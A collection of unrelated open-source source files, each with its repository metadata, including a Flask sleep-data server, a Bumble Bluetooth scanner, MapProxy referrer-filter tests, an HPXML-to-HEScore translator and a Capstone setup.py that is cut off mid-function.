hosts_gen = pagegenerators.CategorizedPageGenerator(cat, start = None, recurse = False)
hosts_gen = pagegenerators.PreloadingGenerator(hosts_gen)
bot = ILO2InventoryBot(hosts_gen)
bot.run()
if __name__ == "__main__":
try:
main()
finally:
wikipedia.stopme()
| {
"content_hash": "849fac10d06230c7324c04da9a6f0316",
"timestamp": "",
"source": "github",
"line_count": 344,
"max_line_length": 191,
"avg_line_length": 35.69767441860465,
"alnum_prop": 0.6215798045602606,
"repo_name": "sicekit/sicekit",
"id": "86e8902c953f3291f6a78c9b5731bccb68667c60",
"size": "12323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "robots/robot-update_hp_servers_ilo2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "82920"
},
{
"name": "PHP",
"bytes": "11147"
},
{
"name": "Python",
"bytes": "1123422"
}
],
"symlink_target": ""
} |
import os
import sys
import pprint
def dump_environ():
print 'os.environ'
pprint.pprint(dict(os.environ))
print
print 'sys.path'
pprint.pprint(list(sys.path))
print
if __name__ == '__main__':
# from .. import submit_ext
# future = submit_ext('qbfutures.test.environ:dump_environ', name="QBFutures Python Environment Test", priority=8000)
# print 'python', future.job_id
from ..maya import Executor
future = Executor().submit_ext('qbfutures.test.environ:dump_environ', name='QBFutures Environment Test', priority=9000)
print 'maya', future.job_id
| {
"content_hash": "662983c9e4c10649845f817801a0689f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 123,
"avg_line_length": 26.608695652173914,
"alnum_prop": 0.6633986928104575,
"repo_name": "westernx/qbfutures",
"id": "659b922902cf969c2719c0254e17d9aeab911ea9",
"size": "612",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qbfutures/test/environ.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "38146"
}
],
"symlink_target": ""
} |
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import absolute_import
from .classifier import MILBoostClassifier
from .softmax import *
| {
"content_hash": "0e5af0fdbf04a9bbcb3728efaccebcd3",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 42,
"avg_line_length": 30.857142857142858,
"alnum_prop": 0.7824074074074074,
"repo_name": "hbldh/skboost",
"id": "6381a941869d4a3d60a70899d2b296dd4c91d10b",
"size": "216",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "skboost/milboost/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "17794"
},
{
"name": "Jupyter Notebook",
"bytes": "9983"
},
{
"name": "Python",
"bytes": "108484"
}
],
"symlink_target": ""
} |
from dateutil.parser import parse
from math import modf
from time import mktime
import csv
import StringIO
import sleepdebugger.config as config
from flask import Flask, request, flash, url_for, render_template, redirect, Response
from flask_debugtoolbar import DebugToolbarExtension
from influxdb import InfluxDBClient
app = Flask(__name__,
static_url_path = "/static",
static_folder = "sleepdebugger/web/static",
template_folder = "sleepdebugger/web/template")
app.secret_key = config.SECRET_KEY
app.debug = config.DEBUG
toolbar = DebugToolbarExtension(app)
@app.route("/", methods=['GET'])
def index():
return render_template("index")
@app.route("/", methods=['POST'])
def record():
txt = request.form['entry']
try:
influx = InfluxDBClient(config.INFLUX_HOST, config.INFLUX_PORT, config.INFLUX_USER, config.INFLUX_PASSWD, config.INFLUX_DB)
except Exception as err:
flash("Entry was not recorded. Influx connection error: %s" % str(err))
if influx:
json_body = [
{
"measurement": "notes",
"tags":
{
"sleeper": config.SLEEPER
},
"fields": { 'note' : txt }
}
]
try:
influx.write_points(json_body)
flash('Entry recorded.')
except Exception as err:
flash("Entry was not recorded. Influx write error: %s" % str(err))
return render_template("index")
@app.route("/export", methods=['GET'])
def export():
return render_template("export")
@app.route("/export", methods=['POST'])
def export_data():
start = request.form['start']
end = request.form['end']
try:
start = parse(start)
except ValueError:
flash("Cannot decipher format of start time.")
return render_template("export", start=request.form['start'], end=request.form['end'])
try:
end = parse(end)
except ValueError:
flash("Cannot decipher format of end time.")
return render_template("export", start=request.form['start'], end=request.form['end'])
try:
influx = InfluxDBClient(config.INFLUX_HOST, config.INFLUX_PORT, config.INFLUX_USER, config.INFLUX_PASSWD, config.INFLUX_DB)
except Exception as err:
flash("Cannot connect to DB.")
return render_template("export", start=request.form['start'], end=request.form['end'])
decimal, integer = modf(mktime(start.timetuple()))
start = "%d" % integer + "%09d" % (decimal * 1000000000)
decimal, integer = modf(mktime(end.timetuple()))
end = "%d" % integer + "%09d" % (decimal * 1000000000)
query = "SELECT mag FROM sleep WHERE time >= %s and time <= %s" % (start, end)
try:
results = influx.query(query)
except Exception as e:
flash("Cannot query influx: %s" % str(e))
return render_template("export", start=request.form['start'], end=request.form['end'])
si = StringIO.StringIO()
cw = csv.writer(si)
for result in results.get_points(measurement="sleep"):
print result
cw.writerow([ result['time'], result['mag'] ])
return Response(si.getvalue().strip('\r\n'), mimetype='text/csv')
if __name__ == "__main__":
app.run(host=config.HOST, port=config.PORT, threaded=True)
| {
"content_hash": "6a798b3b185cd0dd462b52a62ea07e38",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 131,
"avg_line_length": 33.27,
"alnum_prop": 0.6236850015028554,
"repo_name": "mayhem/sleep-debugger",
"id": "1aa360cad8a68b84a58d45839c78f2bb11176c24",
"size": "3350",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "13567"
}
],
"symlink_target": ""
} |
from cloudferrylib.base.action import action
class SnapTransfer(action.Action):
def __init__(self, init, driver,
snap_position):
super(SnapTransfer, self).__init__(init)
self.driver = driver(self.src_cloud, self.dst_cloud)
self.snap_position = snap_position
def run(self, volume, snapshot_info, **kwargs):
self.driver.transfer(volume, snapshot_info, self.snap_position)
return {}
| {
"content_hash": "9617f7029ffaa73468106db5353139df",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 71,
"avg_line_length": 34.46153846153846,
"alnum_prop": 0.6473214285714286,
"repo_name": "mgrygoriev/CloudFerry",
"id": "8888aa1640da44f92b818bd902b60f9b02a571d4",
"size": "1024",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloudferrylib/os/actions/snap_transfer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2615"
},
{
"name": "Python",
"bytes": "775433"
},
{
"name": "Ruby",
"bytes": "5181"
},
{
"name": "Shell",
"bytes": "34787"
}
],
"symlink_target": ""
} |
import asyncio
import sys
import os
import logging
from colors import color
from bumble.device import Device
from bumble.transport import open_transport_or_link
# -----------------------------------------------------------------------------
async def main():
if len(sys.argv) < 2:
print('Usage: run_scanner.py <transport-spec> [filter]')
print('example: run_scanner.py usb:0')
return
print('<<< connecting to HCI...')
async with await open_transport_or_link(sys.argv[1]) as (hci_source, hci_sink):
print('<<< connected')
filter_duplicates = (len(sys.argv) == 3 and sys.argv[2] == 'filter')
device = Device.with_hci('Bumble', 'F0:F1:F2:F3:F4:F5', hci_source, hci_sink)
@device.on('advertisement')
def _(advertisement):
address_type_string = ('PUBLIC', 'RANDOM', 'PUBLIC_ID', 'RANDOM_ID')[advertisement.address.address_type]
address_color = 'yellow' if advertisement.is_connectable else 'red'
address_qualifier = ''
if address_type_string.startswith('P'):
type_color = 'cyan'
else:
if advertisement.address.is_static:
type_color = 'green'
address_qualifier = '(static)'
elif advertisement.address.is_resolvable:
type_color = 'magenta'
address_qualifier = '(resolvable)'
else:
type_color = 'white'
separator = '\n '
print(f'>>> {color(advertisement.address, address_color)} [{color(address_type_string, type_color)}]{address_qualifier}:{separator}RSSI:{advertisement.rssi}{separator}{advertisement.data.to_string(separator)}')
await device.power_on()
await device.start_scanning(filter_duplicates=filter_duplicates)
await hci_source.wait_for_termination()
# -----------------------------------------------------------------------------
logging.basicConfig(level = os.environ.get('BUMBLE_LOGLEVEL', 'DEBUG').upper())
asyncio.run(main())
| {
"content_hash": "64f12fbbf75deb2ca40fb9b4d40f2c91",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 222,
"avg_line_length": 40.23076923076923,
"alnum_prop": 0.5587954110898662,
"repo_name": "google/bumble",
"id": "719e58edd13369b391eee74e9a9c74105dadee11",
"size": "2844",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/run_scanner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4387"
},
{
"name": "Python",
"bytes": "1318219"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import six
from sentry.api.serializers import Serializer, register
from sentry.models import GroupTagKey, TagKey
@register(GroupTagKey)
class GroupTagKeySerializer(Serializer):
def get_attrs(self, item_list, user):
tag_labels = {
t.key: t.get_label()
for t in
TagKey.objects.filter(project=item_list[0].project, key__in=[i.key for i in item_list])
}
result = {}
for item in item_list:
key = TagKey.get_standardized_key(item.key)
try:
label = tag_labels[item.key]
except KeyError:
label = key
result[item] = {
'name': label,
'key': key,
}
return result
def serialize(self, obj, attrs, user):
return {
'id': six.text_type(obj.id),
'name': attrs['name'],
'key': attrs['key'],
'uniqueValues': obj.values_seen,
}
| {
"content_hash": "2c0a709933a647aac468e6135cff9af4",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 99,
"avg_line_length": 27.7027027027027,
"alnum_prop": 0.5287804878048781,
"repo_name": "jean/sentry",
"id": "c2638a5a7fa4fac097dd9efc8b424e2e330b7205",
"size": "1025",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/sentry/api/serializers/models/grouptagkey.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "296112"
},
{
"name": "HTML",
"bytes": "314273"
},
{
"name": "JavaScript",
"bytes": "1293918"
},
{
"name": "Lua",
"bytes": "57158"
},
{
"name": "Makefile",
"bytes": "6632"
},
{
"name": "Python",
"bytes": "24515298"
},
{
"name": "Ruby",
"bytes": "4410"
},
{
"name": "Shell",
"bytes": "2942"
}
],
"symlink_target": ""
} |
while True:
s = raw_input('command:')
if s == 'exit':
break
print 'Length of string is:', len(s)
else:
print 'I won\'t be executed'
print 'over'
| {
"content_hash": "ab2526bb0cbf37d238176762ce7c8484",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 40,
"avg_line_length": 22.125,
"alnum_prop": 0.536723163841808,
"repo_name": "Akagi201/learning-python",
"id": "598024d25ad4e0d937c9d71fc1a2659b1265cca9",
"size": "177",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyramid/Pyramid Web开发入门/1. Python基础和入门介绍/break.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "125"
},
{
"name": "CSS",
"bytes": "82315"
},
{
"name": "HTML",
"bytes": "16738"
},
{
"name": "JavaScript",
"bytes": "253132"
},
{
"name": "Jupyter Notebook",
"bytes": "3666"
},
{
"name": "Less",
"bytes": "2022"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "336950"
},
{
"name": "Rich Text Format",
"bytes": "49342"
},
{
"name": "Shell",
"bytes": "4498"
}
],
"symlink_target": ""
} |
from django.apps import AppConfig
class FinoteApiConfig(AppConfig):
name = 'finote_api'
| {
"content_hash": "ccbcff8d91a6b98dfc686de254e44e83",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 33,
"avg_line_length": 18.8,
"alnum_prop": 0.7553191489361702,
"repo_name": "kentaiwami/FiNote",
"id": "d71cf7da32304b6894e9736bd15535ae2b9a395d",
"size": "94",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/src/finote_api/apps.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "225"
},
{
"name": "Python",
"bytes": "72168"
},
{
"name": "Ruby",
"bytes": "776"
},
{
"name": "Shell",
"bytes": "6122"
},
{
"name": "Swift",
"bytes": "145555"
}
],
"symlink_target": ""
} |
import ctypes
import pathlib
# refer to https://realpython.com/python-bindings-overview
if __name__ == "__main__":
# Load the shared library into ctypes
libname = pathlib.Path().absolute() / "libtiny_util.so"
print("load " + str(libname))
c_lib = ctypes.CDLL(libname)
num = 2.3
ret = c_lib.round_to_int(ctypes.c_float(num))
print("{} round to {} ".format(num, str(ret)))
text = "hello world"
wave = "hello.wav"
b_text = text.encode("utf-8")
b_wave = wave.encode("utf-8")
ret2 = c_lib.text_to_wav(ctypes.c_char_p(b_text), ctypes.c_char_p(b_wave)) | {
"content_hash": "24e0102984baee65853f9ab0b3d60c42",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 78,
"avg_line_length": 26.08695652173913,
"alnum_prop": 0.6166666666666667,
"repo_name": "walterfan/snippets",
"id": "9a36dc9dfb210f2906941d28a39634c1b07cdcac",
"size": "600",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "c/tiny_util_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ANTLR",
"bytes": "349"
},
{
"name": "Assembly",
"bytes": "231"
},
{
"name": "C",
"bytes": "254487"
},
{
"name": "C++",
"bytes": "421817"
},
{
"name": "CSS",
"bytes": "105318"
},
{
"name": "Dockerfile",
"bytes": "510"
},
{
"name": "Go",
"bytes": "3430"
},
{
"name": "HTML",
"bytes": "1850853"
},
{
"name": "Java",
"bytes": "229173"
},
{
"name": "JavaScript",
"bytes": "294777"
},
{
"name": "Jupyter Notebook",
"bytes": "613818"
},
{
"name": "Lex",
"bytes": "1334"
},
{
"name": "Lua",
"bytes": "147083"
},
{
"name": "Makefile",
"bytes": "22205"
},
{
"name": "PHP",
"bytes": "25856"
},
{
"name": "Python",
"bytes": "57064"
},
{
"name": "QMake",
"bytes": "356"
},
{
"name": "Shell",
"bytes": "110"
},
{
"name": "TypeScript",
"bytes": "7461"
},
{
"name": "Yacc",
"bytes": "1084"
}
],
"symlink_target": ""
} |
import unittest
import mock
class TestConnection(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.storage._http import Connection
return Connection
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_extra_headers(self):
from google.cloud import _http as base_http
from google.cloud.storage import _http as MUT
http = mock.Mock(spec=['request'])
response = mock.Mock(status=200, spec=['status'])
data = b'brent-spiner'
http.request.return_value = response, data
client = mock.Mock(_http=http, spec=['_http'])
conn = self._make_one(client)
req_data = 'hey-yoooouuuuu-guuuuuyyssss'
result = conn.api_request(
'GET', '/rainbow', data=req_data, expect_json=False)
self.assertEqual(result, data)
expected_headers = {
'Content-Length': str(len(req_data)),
'Accept-Encoding': 'gzip',
base_http.CLIENT_INFO_HEADER: MUT._CLIENT_INFO,
'User-Agent': conn.USER_AGENT,
}
expected_uri = conn.build_api_url('/rainbow')
http.request.assert_called_once_with(
body=req_data,
headers=expected_headers,
method='GET',
uri=expected_uri,
)
def test_build_api_url_no_extra_query_params(self):
conn = self._make_one(object())
URI = '/'.join([
conn.API_BASE_URL,
'storage',
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._make_one(object())
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', 'storage', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
| {
"content_hash": "52f6808289aabbb38604715ad1bf6880",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 76,
"avg_line_length": 32.88235294117647,
"alnum_prop": 0.5670840787119857,
"repo_name": "dstrockis/outlook-autocategories",
"id": "cb9344a16389b6d47c261f7626aa1e133347ff42",
"size": "2812",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/unit_tests/test__http.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "39286"
},
{
"name": "CSS",
"bytes": "6267"
},
{
"name": "HTML",
"bytes": "449"
},
{
"name": "JavaScript",
"bytes": "6187"
},
{
"name": "Jupyter Notebook",
"bytes": "163002"
},
{
"name": "Python",
"bytes": "11957653"
},
{
"name": "Shell",
"bytes": "423"
}
],
"symlink_target": ""
} |
from webtest import TestApp
from mapproxy.response import Response
from mapproxy.security.referrer import ReferrerFilter, NONE, SELF, REGEX
DENIED=404
class CheckApp(object):
def __init__(self):
self._called = False
def __call__(self, environ, start_response):
self._called = True
return Response('')(environ, start_response)
@property
def called(self):
result = self._called
self._called = False
return result
class TestReferrerFilter(object):
def setup(self):
self.check_app = CheckApp()
def test_no_referrer(self):
app = TestApp(ReferrerFilter(self.check_app))
app.get('/')
assert self.check_app.called
def test_none(self):
app = TestApp(ReferrerFilter(self.check_app, [NONE]))
app.get('/')
assert self.check_app.called
app.get('/', headers={'Referer': 'http://localhost/'}, status=DENIED)
assert not self.check_app.called
def test_string(self):
referrer_filter = ['http://omniscale.de/', 'http://localhost/']
for referrer, allowed in (('http://localhost/bar', True),
('http://localhost:5050/bar', False),
('http://omniscale.net', False)):
yield self.check_referrer, referrer_filter, referrer, allowed
def test_self(self):
referrer_filter = [SELF]
for referrer, allowed in ((None, False),
('http://localhost:80/', True),
('http://localhost/bar', True),
('http:/localhost:5050/', False)):
yield self.check_referrer, referrer_filter, referrer, allowed
def test_regex(self):
referrer_filter = [REGEX('http://([ab]\.)?osm/')]
for referrer, allowed in (
(None, False),
('http://osm/', True),
('http://a.osm/', True),
('http://b.osm/', True),
('http://c.osm/', False),
):
yield self.check_referrer, referrer_filter, referrer, allowed
def check_referrer(self, filter, referrer_header, allowed):
app = TestApp(ReferrerFilter(self.check_app, filter))
headers = {}
if referrer_header:
headers['Referer'] = referrer_header
status = None
if not allowed:
status = DENIED
app.get('/', headers=headers, status=status)
if allowed:
assert self.check_app.called
else:
assert not self.check_app.called
| {
"content_hash": "71dbf0cc8ab7bd1b23749ffa1c1cc459",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 77,
"avg_line_length": 31.49411764705882,
"alnum_prop": 0.5353007097497199,
"repo_name": "Anderson0026/mapproxy",
"id": "f863a8bd79f9cc66515416935abddcf2f3d436d3",
"size": "3324",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mapproxy/test/unit/test_referrer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "12401"
},
{
"name": "Python",
"bytes": "1477825"
},
{
"name": "Shell",
"bytes": "3087"
}
],
"symlink_target": ""
} |
from .base import HPXMLtoHEScoreTranslatorBase
from .exceptions import TranslationError
def convert_to_type(type_, value):
if value is None:
return value
else:
return type_(value)
class HPXML2toHEScoreTranslator(HPXMLtoHEScoreTranslatorBase):
SCHEMA_DIR = 'hpxml-2.3.0'
def check_hpwes(self, p, v3_b):
if p is not None:
return self.xpath(p, 'h:ProjectDetails/h:ProgramCertificate="Home Performance with Energy Star"')
def sort_foundations(self, fnd, v3_b):
# Sort the foundations from largest area to smallest
def get_fnd_area(fnd):
return max([self.xpath(fnd, 'sum(h:%s/h:Area)' % x) for x in ('Slab', 'FrameFloor')])
fnd.sort(key=get_fnd_area, reverse=True)
return fnd, get_fnd_area
def get_foundation_walls(self, fnd, v3_b):
foundationwalls = self.xpath(fnd, 'h:FoundationWall', aslist=True)
return foundationwalls
def get_foundation_slabs(self, fnd, v3_b):
slabs = self.xpath(fnd, 'h:Slab', raise_err=True, aslist=True)
return slabs
def get_foundation_frame_floors(self, fnd, v3_b):
frame_floors = self.xpath(fnd, 'h:FrameFloor', aslist=True)
return frame_floors
def attic_has_rigid_sheathing(self, attic, v3_roof):
return self.xpath(attic,
'boolean(h:AtticRoofInsulation/h:Layer[h:NominalRValue > 0][h:InstallationType="continuous"][boolean(h:InsulationMaterial/h:Rigid)])' # noqa: E501
)
def every_wall_layer_has_nominal_rvalue(self, wall):
# This variable will be true if every wall layer has a NominalRValue *or*
# if there are no insulation layers
wall_layers = self.xpath(wall, 'h:Insulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if wall_layers:
for layer in wall_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(wall, 'h:Insulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_attic_roof_rvalue(self, attic, v3_roof):
# if there is no nominal R-value, it will return 0
return self.xpath(attic, 'sum(h:AtticRoofInsulation/h:Layer/h:NominalRValue)')
def get_attic_roof_assembly_rvalue(self, attic, v3_roof):
# if there is no assembly effective R-value, it will return None
return convert_to_type(float, self.xpath(attic, 'h:AtticRoofInsulation/h:AssemblyEffectiveRValue/text()'))
def every_attic_roof_layer_has_nominal_rvalue(self, attic, v3_roof):
roof_layers = self.xpath(attic, 'h:AtticRoofInsulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if roof_layers:
for layer in roof_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(attic, 'h:AtticRoofInsulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_attic_knee_walls(self, attic):
knee_walls = []
b = self.xpath(attic, 'ancestor::h:Building')
for kneewall_idref in self.xpath(attic, 'h:AtticKneeWall/@idref', aslist=True):
wall = self.xpath(
b,
'descendant::h:Wall[h:SystemIdentifier/@id=$kneewallid]',
raise_err=True,
kneewallid=kneewall_idref
)
knee_walls.append(wall)
return knee_walls
def get_attic_type(self, attic, atticid):
hpxml_attic_type = self.xpath(attic, 'h:AtticType/text()')
rooftypemap = {'cape cod': 'cath_ceiling',
'cathedral ceiling': 'cath_ceiling',
'flat roof': 'cath_ceiling',
'unvented attic': 'vented_attic',
'vented attic': 'vented_attic',
'venting unknown attic': 'vented_attic',
'other': None}
if rooftypemap.get(hpxml_attic_type) is None:
raise TranslationError(
'Attic {}: Cannot translate HPXML AtticType {} to HEScore rooftype.'.format(atticid,
hpxml_attic_type))
return rooftypemap[hpxml_attic_type]
def get_attic_floor_rvalue(self, attic, v3_b):
return self.xpath(attic, 'sum(h:AtticFloorInsulation/h:Layer/h:NominalRValue)')
def get_attic_floor_assembly_rvalue(self, attic, v3_b):
return convert_to_type(float, self.xpath(attic, 'h:AtticFloorInsulation/h:AssemblyEffectiveRValue/text()'))
def every_attic_floor_layer_has_nominal_rvalue(self, attic, v3_b):
frame_floor_layers = self.xpath(attic, 'h:AtticFloorInsulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if frame_floor_layers:
for layer in frame_floor_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(attic, 'h:AtticFloorInsulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_ceiling_area(self, attic):
return float(self.xpath(attic, 'h:Area/text()', raise_err=True))
def get_attic_roof_area(self, roof):
return float(self.xpath(roof, 'h:RoofArea/text()', raise_err=True))
def get_framefloor_assembly_rvalue(self, framefloor, v3_framefloor):
return convert_to_type(float, self.xpath(framefloor, 'h:Insulation/h:AssemblyEffectiveRValue/text()'))
def get_foundation_wall_assembly_rvalue(self, fwall, v3_fwall):
return convert_to_type(float, self.xpath(fwall, 'h:Insulation/h:AssemblyEffectiveRValue/text()'))
def get_slab_assembly_rvalue(self, slab, v3_slab):
return convert_to_type(float, self.xpath(slab, 'h:PerimeterInsulation/h:AssemblyEffectiveRValue/text()'))
def every_framefloor_layer_has_nominal_rvalue(self, framefloor, v3_framefloor):
framefloor_layers = self.xpath(framefloor, 'h:Insulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if framefloor_layers:
for layer in framefloor_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(framefloor, 'h:Insulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_solarscreen(self, wndw_skylight):
return bool(self.xpath(wndw_skylight, 'h:Treatments/text()') == 'solar screen'
or self.xpath(wndw_skylight, 'h:ExteriorShading/text()') == 'solar screens')
def get_hescore_walls(self, b):
return self.xpath(
b, 'h:BuildingDetails/h:Enclosure/h:Walls/h:Wall\
[((h:ExteriorAdjacentTo="ambient" and not(contains(h:ExteriorAdjacentTo, "garage"))) or\
not(h:ExteriorAdjacentTo)) and not(contains(h:InteriorAdjacentTo, "attic"))]', # noqa: E501
aslist=True)
def check_is_doublepane(self, v3_window, glass_layers):
return glass_layers in ('double-pane', 'single-paned with storms', 'single-paned with low-e storms')
def check_is_storm_lowe(self, window, glass_layers):
return glass_layers == 'single-paned with low-e storms'
def get_duct_location(self, hpxml_duct_location, v3_bldg):
return self.duct_location_map[hpxml_duct_location]
duct_location_map = {'conditioned space': 'cond_space',
'unconditioned space': None,
'unconditioned basement': 'uncond_basement',
'unvented crawlspace': 'unvented_crawl',
'vented crawlspace': 'vented_crawl',
'crawlspace': None,
'unconditioned attic': 'uncond_attic',
'interstitial space': None,
'garage': 'unvented_crawl',
'outside': 'outside'}
| {
"content_hash": "dc2daaeaa4074d787d8e487dc2b8e308",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 173,
"avg_line_length": 47.61827956989247,
"alnum_prop": 0.618606751721802,
"repo_name": "NREL/hescore-hpxml",
"id": "4b247126b45494cc9204f2b40bbcb4ce8ff7c20c",
"size": "8857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hescorehpxml/hpxml2.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "401857"
}
],
"symlink_target": ""
} |
import glob
import os
import shutil
import stat
import sys
from distutils import log
from distutils import dir_util
from distutils.command.build_clib import build_clib
from setuptools.command.sdist import sdist
from setuptools import setup
from distutils.sysconfig import get_python_lib
# prebuilt libraries for Windows - for sdist
PATH_LIB64 = "prebuilt/win64/capstone.dll"
PATH_LIB32 = "prebuilt/win32/capstone.dll"
# package name can be 'capstone' or 'capstone-windows'
PKG_NAME = 'capstone'
if os.path.exists(PATH_LIB64) and os.path.exists(PATH_LIB32):
PKG_NAME = 'capstone-windows'
SYSTEM = sys.platform
VERSION = '4.0'
# virtualenv breaks import, but get_python_lib() will work.
SITE_PACKAGES = os.path.join(get_python_lib(), "capstone")
if "--user" in sys.argv:
try:
from site import getusersitepackages
SITE_PACKAGES = os.path.join(getusersitepackages(), "capstone")
except ImportError:
pass
# adapted from commit e504b81 of Nguyen Tan Cong
# Reference: https://docs.python.org/2/library/platform.html#cross-platform
is_64bits = sys.maxsize > 2**32
def copy_sources():
"""Copy the C sources into the source directory.
This rearranges the source files under the python distribution
directory.
"""
src = []
try:
dir_util.remove_tree("src/")
except (IOError, OSError):
pass
dir_util.copy_tree("../../arch", "src/arch/")
dir_util.copy_tree("../../include", "src/include/")
if SYSTEM == "win32":
dir_util.copy_tree("../../msvc/headers", "src/msvc/headers")
src.extend(glob.glob("../../*.[ch]"))
src.extend(glob.glob("../../*.mk"))
src.extend(glob.glob("../../Makefile"))
src.extend(glob.glob("../../LICENSE*"))
src.extend(glob.glob("../../README"))
src.extend(glob.glob("../../*.TXT"))
src.extend(glob.glob("../../RELEASE_NOTES"))
src.extend(glob.glob("../../make.sh"))
src.extend(glob.glob("../../CMakeLists.txt"))
for filename in src:
outpath = os.path.join("./src/", os.path.basename(filename))
log.info("%s -> %s" % (filename, outpath))
shutil.copy(filename, outpath)
class custom_sdist(sdist):
"""Reshuffle files for distribution."""
def run(self):
for filename in (glob.glob("capstone/*.dll")
+ glob.glob("capstone/*.so")
+ glob.glob("capstone/*.dylib")):
try:
os.unlink(filename)
except Exception:
pass
# if prebuilt libraries are existent, then do not copy source
if os.path.exists(PATH_LIB64) and os.path.exists(PATH_LIB32):
return sdist.run(self)
copy_sources()
return sdist.run(self)
class custom_build_clib(build_clib):
"""Customized build_clib command."""
def run(self):
log.info('running custom_build_clib')
build_clib.run(self)
def finalize_options(self):
# We want build-clib to default to build-lib as defined by the "build"
# command. This is so the compiled library will be put in the right
# place along side the python code.
self.set_undefined_options('build',
('build_lib', 'build_clib'),
('build_temp', 'build_temp'),
('compiler', 'compiler'),
('debug', 'debug'),
('force', 'force'))
build_clib.finalize_options(self)
def build_libraries(self, libraries):
if SYSTEM in ("win32", "cygwin"):
# if Windows prebuilt library is available, then include it
if is_64bits and os.path.exists(PATH_LIB64):
shutil.copy(PATH_LIB64, "capstone")
return
elif os.path.exists(PATH_LIB32):
shutil.copy(PATH_LIB32, "capstone")
return
# build library from source if src/ is existent
if not os.path.exists('src'):
return
for (lib_name, build_info) in libraries:
log.info("building '%s' library", lib_name)
os.chdir("src")
# platform description refers at https://docs.python.org/2/library/sys.html#sys.platform
if SYSTEM == "win32":
# Windows build: this process requires few things:
# - CMake + MSVC installed
# - Run this command in an environment setup for MSVC
os.mkdir("build")
os.chdir("build")
# Do not build tests & static library
os.system('cmake -DCMAKE_BUILD_TYPE=RELEASE -DCAPSTONE_BUILD_TESTS=0 -DCAPSTONE_BUILD_STATIC=0 -G "NMake Makefiles" ..')
